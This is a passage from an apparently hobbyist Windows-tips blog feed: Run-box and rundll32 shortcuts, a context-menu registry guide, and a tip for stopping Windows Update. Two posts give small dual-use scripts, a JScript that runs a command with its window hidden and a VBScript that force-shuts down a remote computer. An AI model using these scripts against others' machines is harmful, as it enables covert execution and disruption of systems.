tabcal&lt;br /&gt;Downloads = Downloads&lt;br /&gt;DPI Scaling = dpiscaling&lt;br /&gt;Driver Package Installer = dpinst&lt;br /&gt;Driver Verifier Utility = verifier or, alternatively reset&lt;br /&gt;DVD Player = dvdplay&lt;br /&gt;Encryption File System = rekeywiz&lt;br /&gt;Event Viewer = eventvwr.msc&lt;br /&gt;Fax Cover Sheet Editor = fxscover&lt;br /&gt;File Signature Verification Tool = sigverif&lt;br /&gt;Folders Properties = control folders&lt;br /&gt;Fonts = control fonts&lt;br /&gt;Free Cell Card Game = freecell&lt;br /&gt;Group Policy Editor = gpedit.msc&lt;br /&gt;Iexpress Wizard = iexpress&lt;br /&gt;Internet Explorer = iexplore&lt;br /&gt;Internet Properties = inetcpl.cpl&lt;br /&gt;IP Configuration = ipconfig.exe&lt;br /&gt;iSCSI Initiator = iscsicpl&lt;br /&gt;Keyboard Properties = control keyboard&lt;br /&gt;Libraries = explorer or, alternatively Windows key + E&lt;br /&gt;Local Security Settings = secpol.msc&lt;br /&gt;Local Users and Groups = lusrmgr.msc&lt;br /&gt;Logs You Out Of Windows = logoff&lt;br /&gt;Microsoft Paint = mspaint.exe&lt;br /&gt;Microsoft Support Diagnostic Tool = msdt&lt;br /&gt;Mobility Center (mobile) = mblctr or, alternatively Windows key + X&lt;br /&gt;Mouse Properties = control mouse&lt;br /&gt;Mouse Properties = main.cpl&lt;br /&gt;Network Connections = control netconnections&lt;br /&gt;Network Connections = ncpa.cpl&lt;br /&gt;Notepad = notepad&lt;br /&gt;ODBC Data Source Administrator = odbcad32&lt;br /&gt;On Screen Keyboard = osk or, alternatively Windows key + U&lt;br /&gt;Optional Features Manager = optionalfeatures&lt;br /&gt;Performance Monitor = perfmon.msc&lt;br /&gt;Phone and Modem Options = telephon.cpl&lt;br /&gt;Power Configuration = powercfg.cpl&lt;br /&gt;Printer Migration = PrintBrmUi&lt;br /&gt;Printers and Faxes = control printers&lt;br /&gt;Private Character Editor = eudcedit&lt;br /&gt;Regional Settings = intl.cpl&lt;br /&gt;Registry Editor = regedit.exe&lt;br /&gt;Remote Assistance = msra&lt;br /&gt;Remote Desktop = mstsc&lt;br /&gt;Resultant Set of Policy = rsop.msc&lt;br /&gt;Scheduled Tasks = control schedtasks&lt;br /&gt;Security Center = wscui.cpl&lt;br /&gt;Services = services.msc&lt;br /&gt;Shared Folders/MMC = fsmgmt.msc&lt;br /&gt;Shuts Down Windows = shutdown&lt;br /&gt;Snipping Tool = snippingtool&lt;br /&gt;Sound Recorder = soundrecorder&lt;br /&gt;Sound Volume = sndvol&lt;br /&gt;Sounds and Audio = mmsys.cpl&lt;br /&gt;Spider Solitare Card Game = spider&lt;br /&gt;SQL Client Configuration = cliconfg&lt;br /&gt;Sticky Note = StikyNot&lt;br /&gt;Stored User Names and Passwords = credwiz&lt;br /&gt;System Configuration Editor = sysedit&lt;br /&gt;System Configuration Utility = msconfig&lt;br /&gt;System File Checker Utility = sfc&lt;br /&gt;System Information = msinfo32&lt;br /&gt;System Properties = sysdm.cpl or, alternatively Windows key + Pause&lt;br /&gt;Task Manager = taskmgr&lt;br /&gt;Trusted Platform Module = TpmInit&lt;br /&gt;User Accounts = netplwiz or, alternatively control userpasswords2&lt;br /&gt;Utility Manager = utilman&lt;br /&gt;Windows Activation = slui&lt;br /&gt;Windows Backup Utility = sdclt&lt;br /&gt;Windows Fax and Scan = wfs&lt;br /&gt;Windows Firewall = firewall.cpl&lt;br /&gt;Windows Firewall with Advanced Security = wf.msc&lt;br /&gt;Windows Image Acquisition = wiaacmgr&lt;br /&gt;Windows Magnifier = magnify&lt;br /&gt;Windows Management Infrastructure = wmimgmt.msc&lt;br /&gt;Windows Media Player = wmplayer&lt;br /&gt;Windows Share Creation Wizard = shrpubw&lt;br /&gt;Windows Standalong Update Manager = wusa&lt;br /&gt;Windows System Security Tool = syskey&lt;br /&gt;Windows Update App Manager = wuapp&lt;br /&gt;Wordpad = write&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Different shortcuts&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;These shortcuts let you access specific features and tools in Windows 7. Simply, copy and paste them to the blank field Run.. window and that’s it!&lt;br /&gt;Action Center = rundll32.exe shell32.dll,Control_RunDLL wscui.cpl&lt;br /&gt;Add Network Location = rundll32.exe shwebsvc.dll,AddNetPlaceRunDll&lt;br /&gt;Add/Remove Programs = rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl&lt;br /&gt;Add/Remove Programs = RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0&lt;br /&gt;Add/Remove Windows Components = rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2&lt;br /&gt;Advanced Restore = sdclt.exe /restorewizardadmin&lt;br /&gt;Aero (Transparency feature) Off = Rundll32.exe DwmApi #104&lt;br /&gt;Aero (Transparency feature) On = Rundll32.exe DwmApi #102&lt;br /&gt;Backup Location and Settings = sdclt.exe /configure&lt;br /&gt;Content Advisor = RunDll32.exe msrating.dll,RatingSetupUI&lt;br /&gt;Control Panel = RunDll32.exe shell32.dll,Control_RunDLL&lt;br /&gt;Date and Time = rundll32.exe shell32.dll,Control_RunDLL timedate.cpl&lt;br /&gt;Date and Time (Additional Clocks) = rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1&lt;br /&gt;Date and Time (Properties) = RunDll32.exe shell32.dll,Control_RunDLL timedate.cpl&lt;br /&gt;Device Manager = RunDll32.exe devmgr.dll DeviceManager_Execute&lt;br /&gt;Device Manager = rundll32.exe shell32.dll,Control_RunDLL hdwwiz.cpl&lt;br /&gt;Display Settings = RunDll32.exe shell32.dll,Control_RunDLL access.cpl,,3&lt;br /&gt;Folder Options = RunDll32.exe shell32.dll,Options_RunDLL 0&lt;br /&gt;Folder Options (File Types) = RunDll32.exe shell32.dll,Control_Options 2&lt;br /&gt;Folder Options (Search) = RunDll32.exe shell32.dll,Options_RunDLL 2&lt;br /&gt;Folder Options (View) = RunDll32.exe shell32.dll,Options_RunDLL 7&lt;br /&gt;Forgotten Password Wizard = RunDll32.exe keymgr.dll,PRShowSaveWizardExW&lt;br /&gt;Hibernate = RunDll32.exe powrprof.dll,SetSuspendState&lt;br /&gt;Indexing Options = control.exe srchadmin.dll&lt;br /&gt;Keyboard Properties = RunDll32.exe shell32.dll,Control_RunDLL main.cpl @1&lt;br /&gt;Lock Screen = RunDll32.exe user32.dll,LockWorkStation&lt;br /&gt;Manage Wireless Networks = explorer.exe shell:::{1fa9085f-25a2-489b-85d4-86326eedcd87}&lt;br /&gt;Map Network Drive = RunDll32.exe shell32.dll,SHHelpShortcuts_RunDLL Connect&lt;br /&gt;Mouse Properties = RunDll32.exe shell32.dll,Control_RunDLL main.cpl @0&lt;br /&gt;Network Connections = RunDll32.exe shell32.dll,Control_RunDLL ncpa.cpl&lt;br /&gt;Notification Cache = rundll32.exe shell32.dll,Options_RunDLL 5&lt;br /&gt;Open Control Panel (All Items) = explorer.exe shell:::{21ec2020-3aea-1069-a2dd-08002b30309d}&lt;br /&gt;Pen and Touch Tablet PC (Settings) = rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl&lt;br /&gt;Pen and Touch Tablet PC (Settings Flicks Tab) = rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl,,1&lt;br /&gt;Pen and Touch Tablet PC (Settings Handwriting Tab) = rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl,,2&lt;br /&gt;People Near Me = rundll32.exe shell32.dll,Control_RunDLL collab.cpl&lt;br /&gt;People Near Me (Sign Up Tab) = rundll32.exe shell32.dll,Control_RunDLL collab.cpl,,1&lt;br /&gt;Personalization = rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2&lt;br /&gt;Phone and Modem (Options) = rundll32.exe shell32.dll,Control_RunDLL telephon.cpl&lt;br /&gt;Phone and Modem (Options Modems Tab) = rundll32.exe shell32.dll,Control_RunDLL telephon.cpl,,1&lt;br /&gt;Phone and Modems (Options Advanced Tab) = rundll32.exe shell32.dll,Control_RunDLL telephon.cpl,,2&lt;br /&gt;Power Options = rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl&lt;br /&gt;Power Options Modify Plan Settings = rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl,,1&lt;br /&gt;Regional Settings = RunDll32.exe shell32.dll,Control_RunDLL intl.cpl,,3&lt;br /&gt;Restore Files = sdclt.exe /restorewizard&lt;br /&gt;Screen Resolution = rundll32.exe shell32.dll,Control_RunDLL desk.cpl&lt;br /&gt;ScreenSaver = rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1&lt;br /&gt;Set Program Access and Computer Defaults = rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3&lt;br /&gt;Sound Control Playback Tab = rundll32.exe shell32.dll,Control_RunDLLmmsys.cpl&lt;br /&gt;Sound Control Recording Tab = rundll32.exe shell32.dll,Control_RunDLLmmsys.cpl,,1&lt;br /&gt;Sound Control Sounds Tab = rundll32.exe shell32.dll,Control_RunDLLmmsys.cpl,,2&lt;br /&gt;Stored Usernames /Passwords = RunDll32.exe keymgr.dll,KRShowKeyMgr&lt;br /&gt;System Properties = rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl&lt;br /&gt;System Properties (Advanced Tab) = rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3&lt;br /&gt;System Properties (Hardware Tab) = rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2&lt;br /&gt;System Properties (Remote Tab) = rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5&lt;br /&gt;System Properties (System Protection Tab) = rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4&lt;br /&gt;System Properties (Advanced) RunDll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4&lt;br /&gt;System Properties (Automatic Updates) = RunDll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5&lt;br /&gt;Taskbar Properties = RunDll32.exe shell32.dll,Options_RunDLL 1&lt;br /&gt;Unplug Eject Hardware = RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll&lt;br /&gt;User Accounts = RunDll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl&lt;br /&gt;Welcome Center = rundll32.exe oobefldr.dll,ShowWelcomeCenter&lt;br /&gt;Windows (About) = RunDll32.exe SHELL32.DLL,ShellAboutW&lt;br /&gt;Windows Firewall = RunDll32.exe shell32.dll,Control_RunDLL firewall.cpl&lt;br /&gt;Windows Firewall = rundll32.exe shell32.dll,Control_RunDLL firewall.cpl&lt;br /&gt;Windows Security Center = RunDll32.exe shell32.dll,Control_RunDLL wscui.cpl&lt;br /&gt;Wireless Network Setup = RunDll32.exe shell32.dll,Control_RunDLL NetSetup.cpl,@0,WNSW&lt;br /&gt;Wireless Networks pop-up = rundll32.exe van.dll,RunVAN&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Internet Explorer Advanced Settings&lt;/b&gt;&lt;br /&gt;Delete All (Deeper Cleaning Including Add-on Data Deletion) = RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351&lt;br /&gt;Delete All = RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255&lt;br /&gt;Delete Cookies = RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2&lt;br /&gt;Delete Form Data = RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16&lt;br /&gt;Delete History = RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1&lt;br /&gt;Delete Passwords = RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32&lt;br /&gt;Delete Temporary Internet Files = RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8&lt;/span&gt;&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/windows-7-commands-guide.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-421157419630079885</guid><pubDate>Thu, 08 Sep 2011 08:41:00 +0000</pubDate><atom:updated>2011-09-08T01:41:16.966-07:00</atom:updated><title>Run a application or Process Hidden | JavaScript</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
This is only for educational purpose not any other means
&lt;span class=&quot;fullpost&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;var WindowStyle_Hidden = 0&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;var objShell = WScript.CreateObject(&quot;WScript.Shell&quot;)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;var result = objShell.Run(&quot;cmd.exe /c shutdown.bat&quot;, WindowStyle_Hidden)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
save this file as hidden.js using notepad, before saving the file edit the line &quot;cmd.exe /c shutdown.bat&quot; according to ur use........&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/run-application-or-process-hidden.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-2228351515653509600</guid><pubDate>Thu, 08 Sep 2011 08:24:00 +0000</pubDate><atom:updated>2011-09-08T01:24:40.900-07:00</atom:updated><title>Shutdown a remote computer | VBScript</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
This is only for educational purpose not any other means
&lt;span class=&quot;fullpost&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&#39; Shutdown.vbs&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&#39; Example VBScript to Shutdown computers&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&#39; Version 4.1 - February 2007&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&#39; --------------------------------------Option Explicit&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Dim objShell, strComputer, strInput&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Dim strShutdown&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Do&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;strComputer = (InputBox(&quot; ComputerName to shutdown&quot;, &quot;Computer Name&quot;))&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;If strComputer &amp;lt;&amp;gt; &quot;&quot; Then&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp; strInput = True&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;End if&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Loop until strInput = True&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;strShutdown = &quot;shutdown -s -t 100 -f -m \\&quot; &amp;amp; strComputer&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp; &amp;nbsp; set objShell = CreateObject(&quot;WScript.Shell&quot;)&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp; &amp;nbsp;objShell.Run strShutdown&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Wscript.Quit&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
copy and paste the code in a notepad and save it as shutdown.vbs...thats it....if u double click the file it ll ask for the computer name if u give then it llo shutdown than remote system&lt;/div&gt;
&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/shutdown-remote-computer-vbscript.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-5240647053136576661</guid><pubDate>Wed, 07 Sep 2011 07:27:00 +0000</pubDate><atom:updated>2011-09-07T00:27:36.886-07:00</atom:updated><title>How to Clean Up Windows Context Menu</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
This is only for educational purpose not any other means&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
One of the most irritating things about Windows is the context menu clutter that you have to deal with once you install a bunch of applications. It seems like every application is fighting for a piece of your context menu, and it’s not like you even use half of them.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Today we’ll explain where these menu items are hiding in your registry, how to disable them the geeky way, and an easier cleanup method for non-geeks as well.&lt;/div&gt;
&lt;br /&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image35.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Either way, your context menu won’t look like this one anymore…&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Cleaning the Context Menu by Hacking the Registry&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
If you want to clean things up the truly geeky way, you can open up regedit.exe through the start menu search or run box, and then browse down to one of the following keys… sadly the context menu items are not stored in a single location.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Most of the menu items that used for all files and folders can be found by looking at one of these keys:&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;HKEY_CLASSES_ROOT\*\shell&lt;br /&gt;&lt;br /&gt;HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers&lt;br /&gt;&lt;br /&gt;HKEY_CLASSES_ROOT\AllFileSystemObjects\ShellEx&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Items that are specific to folders can usually be found in one of these keys instead:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;HKEY_CLASSES_ROOT\Directory\shell&lt;br /&gt;&lt;br /&gt;HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
The context menu items found at these different locations will need to be handled differently, and we’ll explain how, so keep reading!&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Dealing with “&lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_shell&quot;&gt;shell&lt;/a&gt;” Items&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Let’s take a look at one item as an example… if you browse down to the shell key under Directory you’ll see the items for Add to &lt;a href=&quot;http://www.videolan.org/vlc/&quot;&gt;VLC media player&lt;/a&gt; and Play with VLC. Items under the regular “shell” key are usually really easy to spot, and easy to deal with.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image36.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
If you want to hide one of these items so that you’ll have to Shift+Right-Click, then you can add a new string value on the right-hand side and name it “Extended” like you can see below:&lt;/div&gt;
&lt;br /&gt;  &lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image37.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
If you’d like to disable it instead, but don’t want to delete the key, you can add a new string value and call it “LegacyDisable”.&lt;/div&gt;
&lt;br /&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image38.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
And of course, you could just delete the whole key if you really wanted to… but I’d export a copy just in case.&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;Dealing with “&lt;a href=&quot;http://www.nirsoft.net/utils/shexview.html&quot;&gt;shellex&lt;/a&gt;” Items&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
You probably noticed the other registry keys above that have “shellex” (Shell Extension) in the name instead of just “shell”. Those types of keys will need to be handled differently… for an example, we’ll head down to one of the keys mentioned above:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;b&gt;HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
These items will be a little more tough to decipher… but you can usually figure out an item by the key name on the left, and then just modify the (Default) value by putting a few dashes in front of it, which will disable the item without actually deleting anything.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
In this example, I’ve clicked on &lt;a href=&quot;http://www.7-zip.org/&quot;&gt;7-ZIP&lt;/a&gt; on the left, and by putting dashes in front of the value data I’ve disabled that menu item.&lt;/div&gt;
&lt;br /&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image39.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
You’ll want to go through each location in the list at the top of this article until you figure out where exactly the offending items are located. At that point, you can use one of the tricks we mentioned in order to disable that item.&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;Dealing With Specific File Type Items&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Sometimes, although not often, the menu items are located on the registry key for a specific file type. In that case you’ll need to first locate the file extension key by looking under &lt;a href=&quot;http://msdn.microsoft.com/en-us/library/ms724475(v=vs.85).aspx&quot;&gt;HKEY_CLASSES_ROOT&lt;/a&gt; for that extension, which will tell you the name of the key that you need to look for.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
For instance, if I wanted to remove a menu item for Excel documents (.xls) I would look at this registry key, which gives me the name of the actual key to look under…&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;b&gt;HKEY_CLASSES_ROOT\.xls&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image44.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
As you can see above, the actual type of the file is “Excel.Sheet.8″, so I’ll then browse down to this registry key:&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;HKEY_CLASSES_ROOT\Excel.Sheet.8\shell&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image45.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
And now I can use the same techniques as above to disable items under “shell”… remember LegacyDisable and Extended? Yep, those work here.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Cleaning Up the Context Menu the Easy Way&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Instead of hacking the registry, you can use two different &lt;a href=&quot;http://www.nirsoft.net/&quot;&gt;NirSoft&lt;/a&gt; utilities to clean up the context menu. Sadly, some of the menu items are implemented as Explorer shell extensions (like the “shellex” keys we explained above), and some are implemented as regular context menu items (like the regular “shell” keys we explained above).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
The first tool we will check out is ShellMenuView, which allows us to manage all of those “shell” key items with an easy to use interface.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Just browse down until you find the offending item, then click the Disable button… which will actually create a LegacyDisable key just like we explained in the manual section above.&lt;/div&gt;
&lt;br /&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image40.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;You’ll see that those items are instantly disabled:&lt;br /&gt;&lt;br /&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image41.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Next, we need to disable those “shellex” or Shell Extensions, using another great Nirsoft utility appropriately called ShellExView. This one works the same exact way as the first utility… just click on the Disable button to remove the items.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image42.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
After using both of these utilities for just a few minutes, I was able to get my context menu back to the pristine “new install” state.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;img border=&quot;0&quot; src=&quot;http://www.howtogeek.com/wp-content/uploads/2008/11/image43.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;Go forth, and clean your context menu clutter! And yes, this works the same in all versions of Windows.&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/how-to-clean-up-windows-context-menu.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-134538243405434370</guid><pubDate>Wed, 07 Sep 2011 07:08:00 +0000</pubDate><atom:updated>2011-09-07T00:08:51.003-07:00</atom:updated><title>Temporarily Disable Windows Update</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
So you’re in the middle of doing something important on your computer when the “Restart your computer to finish installing important updates” dialog comes up, and asks you to restart your computer.&lt;/div&gt;
&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2007/06/image7.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Sure, you can postpone it up to 4 hours, but then the dialog will just come up again. If you were downloading some important files you might not want the computer to reboot automatically.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
The quick way to disable the reboot for the current session is to stop the Windows Update service from running. You can do this by opening an administrative mode command prompt.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Type cmd into the start menu search box, and use Ctrl+Shift+Enter to open in administrative mode. You could also right-click the item in the menu and choose Run as Administrator.&lt;/div&gt;
&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2007/01/WindowsLiveWriter/RunaCommandasAdministratorfromtheWindow_F7DC/image%7B0%7D1.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;Once at the prompt, just type in the following:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;net stop “windows update”&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2007/06/image8.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Don’t worry, the service will start right back up when you reboot your computer, but at least you don’t have to deal with the restart dialog.&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
